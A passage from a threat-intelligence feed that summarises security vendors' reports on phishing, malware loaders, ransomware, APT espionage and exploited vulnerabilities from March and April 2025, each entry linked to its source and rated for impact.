Summary:: DTI researchers have identified a bulletproof hosting provider based in Russia called Proton66 which has become protector for cybercriminals. It is a platform that allows attackers to run their operation without being shut down. One of its new users called Coquettte who is linked to Horrid, known for supporting unskilled cybercriminals. Additionally, researchers discovered a fraudulent websites offering antivirus software called CyberSecureProtect but actually distributing malware. However, a major OPSEC mistake left the website’s malicious files publicly accessible which includes fake installer that connects to two shady URLs to download a second-stage payload. The payload was identified as Rugmi, a loader used to drop other malware like info-stealers, keyloggers, remote access trojans and ransomware.

Source: https://dti.domaintools.com/proton66-where-to-find-aspiring-hackers/

Intel Source:: Cofense

Intel Name:: The_Rise_of_HR_Themed_Phishing_Attacks

Date of Scan:: 2025-04-12

Impact:: LOW

Summary:: Cofense researchers have uncovered a HR-Themed phishing campaign that manipulate employees into sharing sensitive information. The phishing email impersonates a company name called Human Capital with subject line Act Now: Q1 Updates Deadline March 31! which create pressure on employees. This email also includes official language such as staying aligned with our company objectives, setting goals or submitting achievements to appear the email legitimate. The email contains a link named Q1 Wrap-Up Hub which leads them to JotForm survey asking for personal details. After submitting, the user is redirected to a spoofed Microsoft login page. If credentials entered by recipient then attackers gain full access to accounts which can lead to account takeovers, internal data breaches, malware deployment, ransomware attacks and reputation damage.

Source: https://cofense.com/blog/q1-goals-to-gaps-in-security-the-rise-of-hr-themed-phishing

Intel Source:: Seqrite Labs

Intel Name:: Kimsuky_Targets_South_Korea_Again

Date of Scan:: 2025-04-11

Impact:: LOW

Summary:: Researchers at Seqrite Labs have discovered two active campaigns by the APT group Kimsuky (also known as Black Banshee) that use misleading tactics to target South Korean government entities. The campaigns used phishing emails with LNK (shortcut) file attachments that included obfuscated VBA scripts. After de-obfuscation, the scripts were discovered to drop a PDF and a ZIP file, the latter containing four malicious components: two log files, one VBA script, and a PowerShell script. These multi-stage infections were meant to avoid detection while gathering network-related information, indicating a reconnaissance motive.

Source: https://www.seqrite.com/blog/kimsuky-apt-south-korea-pdf-lures/

Intel Source:: Cofense

Intel Name:: A_Double_Edged_Email_Attack

Date of Scan:: 2025-04-11

Impact:: LOW

Summary:: Researchers at Cofense have uncovered a campaign in which attackers use a combination of phishing and malware delivery. The attack starts with an email that appear to be notification of an upcoming file deletion which creates urgency to take quick action. When user click on link in the email, they are redirected to file sharing page where PDF is hosted which contains two links – Preview and download. If the user clicks on Preview, they are taken to the fake Microsoft login page designed to steal their Office365 credentials while clicking on download, they unknowingly install malware disguised as a legitimate OneDrive installer.

Source: https://cofense.com/blog/pick-your-poison-a-double-edged-email-attack

Intel Source:: MalwareBytes

Intel Name:: Fake_Booking_Emails_Target_Hotels

Date of Scan:: 2025-04-11

Impact:: LOW

Summary:: Researchers at Malware bytes have identified a phishing campaign in which Cybercriminals use fake Booking.com emails to trick hotel staff. The scam starts with an email asking the hotel to confirm a booking. If staff click the link, they are redirected on a website with a fake CAPTCHA page that secretly copies a malicious command to the clipboard. When staff follows the verification steps, they unknowingly run the hidden commands which triggers an mshta script that downloads and installs malware, allowing attackers to steal sensitive information or gain access to the hotel’s network.

Source: https://www.threatdown.com/blog/fake-booking-com-emails-target-hotels/

Intel Source:: Google Threat Intelligence

Intel Name:: Rogue_RDP_Espionage_Campaign

Date of Scan:: 2025-04-10

Impact:: LOW

Summary:: Google Threat Intelligence group researchers have discovered a new phishing campaign targeting European government and military groups, which they attribute to the suspected Russia-linked group UNC5837. The campaign used signed.rdp file attachments to launch Remote Desktop Protocol sessions from victims' workstations, not for interactive control, but to exploit lesser-known RDP features such as resource redirection and RemoteApps.

Source: https://cloud.google.com/blog/topics/threat-intelligence/windows-rogue-remote-desktop-protocol/

Intel Source:: Palo Alto

Intel Name:: Kongtuke_Web_Inject_For_Fake_CAPTCHA_Page

Date of Scan:: 2025-04-10

Impact:: LOW

Summary:: Palo Alto researchers have identified an attack chain starting with a malicious script injected into compromised legitimate websites. The script leads to a fake CAPTCHA page that hijacks the victim's clipboard, a process known as "pastejacking." Post-infection traffic resembles activity from Async RAT, but the final malware remains unidentified, and no sample is currently available.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt

Intel Source:: Hunt.IO

Intel Name:: Tactics_of_Gamaredon_and_ShadowPad

Date of Scan:: 2025-04-09

Impact:: HIGH

Summary:: Hunt.io researchers have analyzed the ongoing infrastructure tactics employed by two distinct state-sponsored groups, Gamaredon (suspected Russian origin) and a cluster linked to RedFoxtrot/ShadowPad (suspected Chinese origin), highlighting their methods for maintaining operational resilience and stealth. Gamaredon continues its focus on Ukrainian government and civil society targets, alongside Western entities, Africa, and NATO states, utilizing a low-frequency, single-flux DNS technique with rapidly changing IP addresses, short TTLs, wildcard A records, and consistent reuse of a specific TLS certificate for its .ru domains, complicating takedown efforts. Concurrently, the RedFoxtrot-linked activity leverages dynamic DNS services, spoofed certificates (e.g., mimicking Microsoft), and JA4X fingerprinting across various VPS providers to stage infrastructure, delivering the modular ShadowPad backdoor via DLL side-loading using a legitimate but vulnerable executable, often orchestrated by PowerShell and batch scripts.

Source: https://hunt.io/blog/state-sponsored-activity-gamaredon-shadowpad

Intel Source:: sophos

Intel Name:: Qilin_Ransomware_Targets_MSP_Admin

Date of Scan:: 2025-04-09

Impact:: MEDIUM

Summary:: Researchers at Sophos have discovered a Qilin ransomware affiliate using a phishing attack to compromise a Managed Service Provider administrator's ScreenConnect Remote Monitoring and Management tool. Using the evilginx adversary-in-the-middle framework, the attackers intercepted passwords and bypassed multi-factor authentication by creating a fake ScreenConnect login page. Once within the MSP's ScreenConnect Cloud portal, the threat actors installed Qilin ransomware, which affected downstream clients.

Source: https://news.sophos.com/en-us/2025/04/01/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect/

Intel Source:: ASEC

Intel Name:: ViperSoftX_Malware_Distribution

Date of Scan:: 2025-04-08

Impact:: LOW

Summary:: ASEC researchers have identified a campaign where Arabic-speaking threat actors are distributing a malware called ViperSoftX to target users in South Korea. This malware primarily spread through cracked software or torrent downloads and operates via PowerShell scripts that communicate with C2 server using URLs containing paths. Once executed, it contacts with the attacker’s sever to downloads a PowerShell script and a VBS file. The VBS file runs the script which then downloads additional payloads such as PureCrypte and Quasar RAT.

Source: https://asec.ahnlab.com/ko/87336/

Intel Source:: Socket

Intel Name:: Lazarus_Expands_NPM_Campaign_with_11_Packages

Date of Scan:: 2025-04-08

Impact:: MEDIUM

Summary:: Lazarus-linked North Korean threat actors behind the Contagious Interview operation have expanded their npm malware campaign, introducing new RAT loaders and using hex obfuscation to evade detection. The latest malicious packages deliver BeaverTail malware and are designed to compromise developer systems, steal sensitive data, and maintain access. The group continues to create new npm accounts and deploy malicious code across npm, GitHub, and Bitbucket, with over 5,600 downloads across 11 packages.

Source: https://socket.dev/blog/lazarus-expands-malicious-npm-campaign-11-new-packages-add-malware-loaders-and-bitbucket

Intel Source:: Seqrite

Intel Name:: HollowQuill_Malware_via_Research_PDFs

Date of Scan:: 2025-04-08

Impact:: MEDIUM

Summary:: Researchers from SEQRITE Labs have discovered Operation HollowQuill, a targeted cyber effort that used research-themed fake PDFs to infiltrate Russian academic and defense networks. The attack primarily targets the Baltic State Technical University (BSTU "VOENMEKH"), an important institution in Russia's military-industrial network. Malicious RAR files containing a.NET malware dropper are used by attackers to deploy a Golang-based shellcode loader with a legitimate OneDrive application and a fake document.

Source: https://www.seqrite.com/blog/operation-hollowquill-russian-rd-networks-malware-pdf/

Intel Source:: Securelist

Intel Name:: ToddyCat_Exploits_ESET_Scanner

Date of Scan:: 2025-04-07

Impact:: LOW

Summary:: Researchers from Securelist have observed that the ToddyCat APT group used a stealthy tool called TCESB to execute malicious payloads while avoiding detection by running alongside legitimate security software. The attackers used CVE-2024-11859, a weakness in ESET's command-line scanner, to load a malicious DLL using a DLL proxying approach. TCESB, based on modified EDRSandBlast code, disables essential system monitoring functions by modifying kernel structures and employs a Bring Your Own susceptible Driver (BYOVD) strategy with a susceptible Dell driver (CVE-2021-36276).

Source: https://securelist.com/toddycat-apt-exploits-vulnerability-in-eset-software-for-dll-proxying/116086/

Intel Source:: CERT-UA

Intel Name:: UAC_0226_Espionage_GiftedRook_Stealer

Date of Scan:: 2025-04-07

Impact:: LOW

Summary:: Since February 2025, Ukraine's CERT-UA has been monitoring espionage activities targeting military, law enforcement, and government sectors, particularly along the eastern border. The attacks primarily involve emails with malicious XLSM attachments related to topics like demining, fines, and UAV production. These attachments contain base64-encoded strings that, when decoded by macros, deliver executable payloads. Two known malware tools have been identified: a .NET-based reverse-shell and a C/C++ stealer (GIFTEDCROOK) that exfiltrates browser data to Telegram. The threat cluster is tracked as UAC-0226.

Source: https://cert.gov.ua/article/6282946

Intel Source:: Huntress

Intel Name:: CrushFTP_CVE_2025_31161_Exploited

Date of Scan:: 2025-04-07

Impact:: MEDIUM

Summary:: Huntress researchers have discovered active exploitation of CVE-2025-31161, a major authentication bypass issue that affects CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. Successful exploitation grants attackers administrative access to the application, allowing for further compromise.

Source: https://www.huntress.com/blog/crushftp-cve-2025-31161-auth-bypass-and-post-exploitation

Intel Source:: AquaSec

Intel Name:: New_Attack_Targeting_Apache_Tomcat_Servers

Date of Scan:: 2025-04-07

Impact:: MEDIUM

Summary:: Aqua Nautilus researchers have uncovered a new attack campaign targeting Apache Tomcat servers, where attackers exploit weak credentials to gain access. They upload encrypted payloads that create backdoors and persistence mechanisms, deploying two binaries disguised as kernel processes. The attack, which affects both Windows and Linux systems, steals SSH credentials to spread laterally and hijacks resources for cryptocurrency mining. The campaign is linked to a new infrastructure, possibly connected to a Chinese-speaking threat actor.

Source: https://www.aquasec.com/blog/new-campaign-against-apache-tomcat/

Intel Source:: Cyfirma

Intel Name:: Neptune_RAT_Targets_Windows_Users

Date of Scan:: 2025-04-07

Impact:: LOW

Summary:: Researchers at CYFIRMA have found a new version of Neptune RAT, a powerful Windows-based remote access trojan with destructive capabilities and password exfiltration from over 270 software applications. This Visual Basic.NET malware, which was distributed via sites such as GitHub, Telegram, and YouTube, downloads and executes payloads hosted on catbox.moe using PowerShell commands (irm and iex).

Source: https://www.cyfirma.com/research/neptune-rat-an-advanced-windows-rat-with-system-destruction-capabilities-and-password-exfiltration-from-270-applications/

Intel Source:: ASEC

Intel Name:: Remcos_RAT_Disguised_as_Waybill

Date of Scan:: 2025-04-06

Impact:: LOW

Summary:: Researchers at ASEC have identified a sophisticated phishing attempt utilizing Remcos RAT malware disguised as a waybill from a major shipping organization. The attack begins with a malicious email containing an HTML script that downloads an obfuscated JavaScript file. This script then generates and executes many files, including a legal AutoIt loader that launches a malicious AutoIt script. The malware is intended to remain on the system and employs a series of API injections to run Remcos RAT within a normal process, granting remote access and data theft.

Source: https://asec.ahnlab.com/en/87106/

Intel Source:: Mandiant

Intel Name:: Exploitation_of_Ivanti_Connect_Secure_Vulnerability

Date of Scan:: 2025-04-06

Impact:: MEDIUM

Summary:: April 3, 2025, Ivanti has disclosed a critical vulnerability CVE-2025-22457 in its Connect Secure (ICS) VPN appliances version which allows remote code execution through a buffer overflow exploit. Researchers observed that attackers have been exploiting this vulnerability since March 2025 to mainly target outdated ICS 9.X and 22.7R2.5 or earlier versions. It believes that China-linked espionage group UNC5221 is exploiting this vulnerability to deploy new malware strain called TRAILBLAZE and BRUSHFIRE. TRAILBLAZE is an in-memory dropper that injects BRUSHFIRE backdoor which hides inside the ICS web process. BRUSHFIRE then unlocks and runs hidden code, allowing attackers to control the system without being detected.

Source: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/

Intel Source:: Jscramber

Intel Name:: Skimming_Campaign_Exploits_Stripe_API

Date of Scan:: 2025-04-05

Impact:: LOW

Summary:: Researchers at Jscrambler have identified a sophisticated web skimming campaign that uses a deprecated Stripe API to check stolen payment details before exfiltration, guaranteeing that only valid card data is transferred to attackers. The campaign uses multiple JavaScript injections, with the final skimmer overlaying a fake Stripe iframe on checkout web pages.

Source: https://jscrambler.com/blog/stripe-api-skimming-campaign

Intel Source:: Group IB

Intel Name:: The_Rise_of_Hunters_International_Ransomware

Date of Scan:: 2025-04-05

Impact:: MEDIUM

Summary:: Group-IB researchers have analyzed the Hunters International ransomware operation, possibly launched in October 2023, which is set to rebrand as World Leaks, focusing solely on extortion. The group use OSINT tools to extort victims via various channels and targets multiple OS architectures. Their ransomware no longer renames files or drops ransom notes from version 6 onward. They offer a tool, Storage Software, to collect exfiltrated data and facilitate victim interaction via a control panel. While similarities exist between Hunters International, Lynx, and INC Ransom, no concrete evidence links them as the same operation.

Source: https://www.group-ib.com/blog/hunters-international-ransomware-group/

Intel Source:: Ontinue

Intel Name:: Signed_Binaries_Sideloaded_for_Compromise

Date of Scan:: 2025-04-04

Impact:: LOW

Summary:: Ontinue's Cyber Defence Centre have identified a sophisticated multi-stage attack using vishing, remote access tools, and living-off-the-land techniques. The threat actor exploited Microsoft Teams for social engineering, delivering a malicious PowerShell payload, then used Quick Assist for remote access. Signed binaries like TeamViewer.exe and a sideloaded malicious DLL (TV.dll) were deployed, followed by a JavaScript-based C2 backdoor via Node.js. The attack shares similarities with tactics used by the Storm-1811 group, known for leveraging vishing, Quick Assist, and social engineering for initial access.

Source: https://www.ontinue.com/resource/blog-signed-sideloaded-compromised/

Intel Source:: ASEC

Intel Name:: BeaverTail_and_Tropidoor_Spread_via_Emails

Date of Scan:: 2025-04-04

Impact:: LOW

Summary:: ASEC researchers have observed threat actors impersonating a recruitment email from Dev.to to distribute malware, including BeaverTail and the "car.dll" downloader. The malicious project was shared via a BitBucket link, and the victim discovered the harmful code, which was then disclosed to the community. While the link is no longer active, analysis of files on VirusTotal confirmed that BeaverTail, used by North Korean attackers for data theft, was involved. The "car.dll" downloader, which executes Windows commands internally, shares similarities with LightlessCan malware linked to the Lazarus group.

Source: https://asec.ahnlab.com/en/87299/

Intel Source:: Securelist

Intel Name:: TookPS_Downloader

Date of Scan:: 2025-04-04

Impact:: LOW

Summary:: Securelist researchers have observed that cybercriminal have been using various software to trick users into downloading malware. Initially, they used DeepSeek but later on moved to other software such as UltraViewer, AutoCAD and SketchUp, Ableton and Quicken. The attackers create fraudulent websites that appear legitimate and offers free downloads of these applications. Once a victim downloads and installs the application, a downloader called TookPS contacts a remote C2 server to retrieve a series of PowerShell scripts. These scripts install an SSH server that allow attackers to secretly access the victim’s system. Additionally, the malware downloads TeviRat, a backdoor that uses DLL sideloading to manipulate TeamViewer, giving attackers hidden remote control. The attacker’s goal is to gain access to compromised devices, potentially leading to data theft, espionage or further malicious activities.

Source: https://securelist.com/tookps/116019/

Intel Source:: Zscaler

Intel Name:: Analyzing_New_HijackLoader_Evasion_Tactics

Date of Scan:: 2025-04-04

Impact:: MEDIUM

Summary:: Zscaler ThreatLabz reports ongoing development and enhancement of HijackLoader, a modular malware downloader first identified in 2023, designed to deliver second-stage payloads while evading security controls. Recent updates introduce new modules focused specifically on advanced evasion and persistence. Key techniques now include call stack spoofing to mask the origin of malicious API calls by manipulating stack frames, anti-virtual machine checks to detect analysis environments, and establishing persistence via scheduled tasks configured through dedicated modules. HijackLoader continues to leverage established methods like direct syscall execution via Heaven's Gate, process blocklisting, and storing encrypted modules within PNG files, now sometimes using the pixel structure itself. The primary objective appears to be stealthy payload delivery and maintaining access.

Source: https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics

Intel Source:: Wiz

Intel Name:: Fileless_Cryptominer_Targets_Exposed_PostgreSQL

Date of Scan:: 2025-04-03

Impact:: LOW

Summary:: Wiz researchers have discovered a new variant of an ongoing campaign targeting misconfigured and publicly exposed PostgreSQL servers. The threat actor, identified as JINX-0126, exploits weak login credentials to access vulnerable servers and deploy XMRig-C3 cryptominers. The actor assigns a unique mining worker to each victim, and analysis reveals three linked wallets, affecting over 1,500 victims. The research highlights the prevalence of misconfigured PostgreSQL instances, with nearly 90% of cloud environments hosting PostgreSQL, and one-third having at least one publicly exposed instance, making them prime targets for opportunistic attacks.

Source: https://www.wiz.io/blog/postgresql-cryptomining

Intel Source:: G Data

Intel Name:: Emmenhtal_Unleashes_SmokeLoader_Malware

Date of Scan:: 2025-04-03

Impact:: MEDIUM

Summary:: Researchers at GDATA have identified a malicious campaign targeting First Ukrainian International Bank (pumb[.]ua), involving a stealthy malware loader called Emmenhtal (a slightly unconventional spelling referring to its HTA component, sometimes also known as Peaklight). This loader, active since early 2024, is primarily used by financially motivated attackers to deliver commodity infostealers like CryptBot and Lumma. In this campaign, Emmenhtal has been seen working in tandem with SmokeLoader malware, taking advantage of its modular nature to dynamically deploy additional malicious payloads.

Source: https://www.gdatasoftware.com/blog/2025/03/38160-emmenhtal-smokeloader-malware

Intel Source:: Elastic Security Labs

Intel Name:: Outlaw_Malware

Date of Scan:: 2025-04-03

Impact:: MEDIUM

Summary:: Elastic Security Labs researchers have observed Outlaw, a Linux-based, persistent but unsophisticated malware primarily targeting cloud and IoT environments. Despite its lack of advanced evasion techniques, Outlaw remains effective by using simple methods like SSH brute-forcing, SSH key manipulation, cron-based persistence, and modified coin miners. It spreads through worm-like propagation, using compromised hosts to launch further attacks. A honeypot deployment revealed real-time operator actions, offering valuable insights into their methods.

Source: https://www.elastic.co/security-labs/outlaw-linux-malware

Intel Source:: eSentire

Intel Name:: KoiLoader_Attack_Exfiltrates_Data_via_Shortcut

Date of Scan:: 2025-04-02

Impact:: LOW

Summary:: eSentire researchers have uncovered a multi-stage malware attack initiated by a malicious shortcut file ("chase_statement_march.lnk"). The attack begins with a spam email containing a zip file that exploits a Windows vulnerability to hide a harmful command in the shortcut properties. This triggers the download of JScript files, disables security defenses via PowerShell, and establishes persistence. The attack employs KoiLoader to unpack encrypted payloads, use UAC bypass techniques, and evade detection. Koi Stealer is then deployed to exfiltrate sensitive information, with the malware communicating with its C2 server using encrypted requests.

Source: https://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis

Intel Source:: Welivesecurity

Intel Name:: FamousSparrow_Group_Targeting_US_and_Mexico

Date of Scan:: 2025-04-02

Impact:: MEDIUM

Summary:: ESET researchers have discovered that the FamousSparrow APT group compromised a U.S. financial sector trade group and a research institute in Mexico. The group deployed two new, undocumented versions of the SparrowDoor backdoor, including a modular variant, which improve upon previous versions by enabling parallelized commands. Additionally, FamousSparrow was observed using the ShadowPad backdoor for the first time.

Source: https://www.welivesecurity.com/en/eset-research/you-will-always-remember-this-as-the-day-you-finally-caught-famoussparrow/

Intel Source:: CISA

Intel Name:: RESURGE_Malware

Date of Scan:: 2025-04-02

Impact:: MEDIUM

Summary:: CISA analyzed malware designated RESURGE, recovered from a critical infrastructure organization's Ivanti Connect Secure device following exploitation of CVE-2025-0282 for initial access, as detailed in their March 28, 2025 report. RESURGE, exhibiting similarities to SPAWNCHIMERA, establishes a Secure Shell (SSH) tunnel for command and control (C2), modifies files, bypasses integrity checks, and deploys a web shell onto the Ivanti boot disk for persistence. The malware suite also includes a SPAWNSLOTH variant for log tampering and a custom binary leveraging BusyBox applets to extract kernel images and execute additional payloads, indicating defense evasion and information gathering objectives. This activity represents a significant threat due to the compromise of secure access appliances within critical infrastructure, potentially enabling attackers to gain persistent network access, execute arbitrary commands, and manipulate device integrity.

Source: https://www.cisa.gov/news-events/analysis-reports/ar25-087a

Intel Source:: Bitdefender

Intel Name:: RedCurl_Adopts_QWCrypt_Ransomware

Date of Scan:: 2025-04-01

Impact:: LOW

Summary:: Researchers at Bitdefender Labs have revealed that the RedCurl hacking group, which was previously renowned for stealthily collecting data, is now deploying ransomware. They developed a new ransomware named QWCrypt, which had never been seen before. Unlike most ransomware gangs, RedCurl appears to function differently, possibly as cyber mercenaries or a group that prefers private conversations over public ransom demands.

Source: https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive

Intel Source:: Zscaler

Intel Name:: CoffeeLoader_Malware

Date of Scan:: 2025-04-01

Impact:: MEDIUM

Summary:: Zscaler ThreatLabz has identified a new malware called CoffeeLoader that first emerged in September 2024. The main objective of this malware is to download and execute additional malware while evading detection by security devices. This malware uses advanced techniques such as call stack spoofing, sleep obfuscation, and Windows fibers for stealth. It comes with a unique packer called Armoury which executes code on GPU (graphics processing unit) instead of CPU. Additionally, Researchers also observed that CoffeeLoader is delivered through SmokeLoader and is being used to deploy Rhadamanthys.

Source: https://www.zscaler.com/blogs/security-research/coffeeloader-brew-stealthy-techniques

Intel Source:: SentinelOne

Intel Name:: ReaderUpdate_Loader_Targeting_MacOS

Date of Scan:: 2025-04-01

Impact:: LOW

Summary:: Sentinel researchers have identified a malware loader called ReaderUpdate targeting macOS system that has been active since 2020. Initially, it was used to deliver Genieo adware also known as DOLITTLE but it re-emerged in 2024 with new variants written in multiple languages such as Crystal, Nim, and Rust. Most recent version is written in Go language. When this malware executes, it collects the hardware details of compromised macOS system using built-in system command which generates unique ID for the device and sends it to a remote server controlled by the attackers.

Source: https://www.sentinelone.com/blog/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/

Intel Source:: ASEC

Intel Name:: Phishing_Campaign_Delivers_Xworm_RAT

Date of Scan:: 2025-03-31

Impact:: LOW

Summary:: Researchers from ASEC have discovered a phishing campaign distributing GuLoader malware through phishing emails impersonating a well-known shipping company. These emails trick recipients into checking customs clearance tax details and execute the attached file. These files contain an obfuscated VBScript and when these files executed, it runs hidden PowerShell Script and downloads additional malicious files from external sources. The scripts also create registry key with random name to maintain persistence on compromised system. The malware executes msiexec[.]exe and injects Xworm RAT into it and executes it.

Source: https://asec.ahnlab.com/ko/86973/

Intel Source:: Cofense

Intel Name:: Fake_US_ESTA_Emails

Date of Scan:: 2025-03-31

Impact:: LOW

Summary:: Cofense researchers have observed that cybercriminals are taking advantage of recent uncertainty and confusion related to U.S. immigration by sending a fake email impersonate U.S. Customs and Border Protection. The emails with link claims that recipient needs to submit a new Electronic System for Travel Authorization (ESTA) application. If the recipient clicks on the link, it redirects to the deceptive website that appear the official ESTA application portal to trick users into providing sensitive personal information such as passport details, home address, social media accounts, and employment history.

Source: https://cofense.com/blog/decoding-fake-us-esta-emails-scam-or-real-deal

Intel Source:: CERT-AGID

Intel Name:: Gemelli_Hospital_of_Rome_Targeted_by_Malicious_Actors

Date of Scan:: 2025-03-31

Impact:: LOW

Summary:: CERT-AGID has identified a phishing campaign targeting employees of Agostino Gemelli University Hospital to steal their login credentials. The attackers send fake security emails with the subject line Notice of Unauthorized Access to Your Account impersonating the hospital’s IT security team. The email claims that someone from Pyongyang, North Korea has accessed the employee’s account that urges them to verify the login their account. When an employee clicks on the link, they redirect to the fake login page. After login and clicking on the login button, their credentials is stolen by the attackers.

Source: https://cert-agid.gov.it/news/policlinico-gemelli-di-roma-preso-di-mira-da-attori-malevoli/

Intel Source:: Reversinglabs

Intel Name:: Malicious_NPM_Packages_Deliver_Reverse_Shell

Date of Scan:: 2025-03-31

Impact:: LOW

Summary:: Researchers at ReversingLabs have discovered to suspicious software packages on npm called ethers-provider2 and ethers-providerz. These packages act as downloaders that modify a legitimate npm package ethers by inserting malicious code into it and create a connection to the attackers that give them a full control to the compromised machine remotely. When the package is installed, it executes a script that fetches a second stage malware which checks the ethers package. If found, it replaces a core file with a malicious version that downloads and executes a third-stage payload. This payload establishes a reverse shell which creates a file (loader[.]js) to ensure the malicious patch remains active.

Source: https://www.reversinglabs.com/blog/malicious-npm-patch-delivers-reverse-shell

Intel Source:: Esentire

Intel Name:: Hunter_International_Ransomware_Group

Date of Scan:: 2025-03-30

Impact:: MEDIUM

Summary:: Researchers at Esentire have uncovered a ransomware attack on retail company. This attack is linked to Hunters International that emerged in 2023. This group bought the ransom code from Hive and is believed to operate as a standalone group with its own infrastructure. The attackers gained the initial access by exploiting vulnerability CVE-2024-55591 in FortiOS and FortiProxy which allowed them to bypass authentication. They used VPN to move within the network through RDP. After gaining access, attacker conducted reconnaissance, created new user accounts and exfiltrated data using Rclone before switching to WinSCP. After exfiltrating, the group deployed Hunters International Ransomware to encrypt files across the network to demand a ransomware payment.

Source: https://www.esentire.com/blog/from-access-to-encryption-dissecting-hunters-internationals-latest-ransomware-attack

Intel Source:: Malwarebytes

Intel Name:: Semrush_Impersonation_Scam_in_Google_Ads

Date of Scan:: 2025-03-30

Impact:: LOW

Summary:: Researchers from Malwarebytes have found a Semrush impersonation fraud that targets Google Ads users. Cybercriminals are using malicious advertising to send victims to a fraud Semrush login pages, where only the "Log in with Google" option is enabled, deceiving visitors into disclosing their Google login information. The attackers initially used Google Ads to target Google accounts, but they have since switched to impersonating Semrush totally. To add credibility to the fraud, the attackers established domains that looked like Semrush.

Source: https://www.malwarebytes.com/blog/news/2025/03/semrush-impersonation-scam-hits-google-ads

Intel Source:: Seqrite

Intel Name:: SvcStealer_Malware_Campaign

Date of Scan:: 2025-03-30

Impact:: LOW

Summary:: Seqrite researchers have identified a new strain of info stealer called SvcStealer that first emerged in January 2025. This malware distributes through phishing emails with malicious attachments. It is capable of stealing sensitive information such as system details, installed programs, user credentials, cryptocurrency wallets, messaging apps, and browser data. It then sends the stolen data to attacker’s C2 server. Additionally, cybercriminals may sell the stolen data on underground forums and Illegal marketplaces.

Source: https://www.seqrite.com/blog/svc-new-stealer-on-the-horizon/

Intel Source:: Cyble

Intel Name:: FizzBuzz_to_FogDoor

Date of Scan:: 2025-03-30

Impact:: LOW

Summary:: Cyble researchers have uncovered a campaign wherein attackers are targeting polish speaking developers by giving coding challenge on Github. They create a deceptive job recruitment test called FizzBuzz to trick victims into downloading an ISO file that contains a JavaScript along with malicious LNK file. When the file is executed, it runs a PowerShell script that installs a backdoor called FogDoor. The malware communicates through a social media platform via Dead Drop Resolver (DDR) technique and exfiltrate sensitive information such as browser cookies, saved passwords, installed applications and file details. Additionally, researchers have discovered GitHub repository is now distributing invoice-themed LNK file as faktura_2025.pdf.lnk which use the same FogDoor backdoor and attack infrastructure.

Source: https://cyble.com/blog/fake-coding-challenges-steal-sensitive-data-via-fogdoor/

Intel Source:: Mcafee

Intel Name:: Malware_Campaigns_Exploit_DeepSeek_Hype

Date of Scan:: 2025-03-29

Impact:: LOW

Summary:: Researchers at McAfee have detected an increase in malware activities that exploit the buzz around DeepSeek AI to target unwary users. Cybercriminals are using trendy search phrases and SEO poisoning techniques to increase the prominence of rogue websites, a common tactic used to transmit malware. The recent release of the DeepSeek-R1 model and associated chatbot app, which immediately gained popularity, provided a chance for scammers to fool customers by distributing counterfeit DeepSeek software, fake websites, and fraudulent mobile apps.

Source: https://www.mcafee.com/blogs/internet-security/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware/

Intel Source:: Cisco Talos

Intel Name:: UAT_5918_Targets_Critical_Infrastructure_Entities_in_Taiwan

Date of Scan:: 2025-03-29

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos uncovered a cyber espionage campaign conducted by a threat group called UAT-5918 which has been active since 2023. This group primarily targets organisations in Taiwan, focusing on industries such as telecommunications, healthcare, IT and critical infrastructure. The group’s main goal is to establish long-term access to victim networks to harvest sensitive information and credentials. UAT-5918 gains access by exploiting unpatched vulnerabilities in web and application servers and relies on open-source tools which include FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg for network reconnaissance, lateral movement and persistence.

Source: https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/

Intel Source:: Cado Security

Intel Name:: Jupyter_Notebooks_Targeted_by_Cryptominer

Date of Scan:: 2025-03-29

Impact:: LOW

Summary:: Cado Security Labs have discovered a new cryptomining campaign targeting misconfigured Jupyter Notebooks. These interactive Python environments, typically used by data scientists, are being exploited to deliver a cryptominer. The attack, detected through Cado Labs' honeypots, involves retrieving a bash script and a Microsoft Installer (MSI) file. After extracting the MSI file, it executes a custom action that points to a malicious executable named "Binary.freedllBinary," potentially compromising both Windows and Linux systems.

Source: https://www.cadosecurity.com/blog/jupyter-notebooks-cryptominer

Intel Source:: Palo Alto

Intel Name:: RustDoor_and_Koi_Stealer_Campaign

Date of Scan:: 2025-03-28

Impact:: LOW

Summary:: Palo Alto researchers have uncovered RustDoor, a Rust-based macOS malware posing as a legitimate software update, along with a new variant of Koi Stealer. The malware uses rare evasion techniques to avoid detection. Additionally, suspected North Korean threat actors are behind a campaign called Contagious Interview, where attackers impersonate recruiters to trick job seekers into installing malware disguised as legitimate development software, primarily targeting the tech industry.

Source: https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/

Intel Source:: Silent Push

Intel Name:: Evolving_Raspberry_Robin_Attack_Strategies

Date of Scan:: 2025-03-28

Impact:: LOW

Summary:: Researchers at Silent Push have uncovered approximately 200 unique Raspberry Robin command and control domains through analyzing key nameservers, domain naming conventions, and IP diversity patterns. Their partnership with Team Cymru resulted in updated 2024 NetFlow data, indicating a single IP address that connects Raspberry Robin's C2 infrastructure.

Source: https://www.silentpush.com/blog/raspberry-robin/

Intel Source:: Seqrite

Intel Name:: New_Steganography_Malware_Campaign

Date of Scan:: 2025-03-28

Impact:: LOW

Summary:: Researchers at Seqrite have observed that the campaign involves a complex infection chain, starting with a phishing email containing an Excel file that exploits a vulnerability to download an HTA file. This file executes VBScript, which creates a batch file to download an obfuscated VBScript from a paste URL. The script then decodes a base64-encoded malicious payload hidden in a JPG image. The payload is executed via a function called VAI, which retrieves a second-stage payload through a reversed base64-encoded file. This campaign, though inactive recently, is notable for its steganographic use of base64 encoding within images to distribute malware.

Source: https://www.seqrite.com/blog/steganographic-campaign-distributing-malware/

Intel Source:: Sonicwall

Intel Name:: MoDiRAT_Targets_France_via_Horus_Protector

Date of Scan:: 2025-03-28

Impact:: MEDIUM

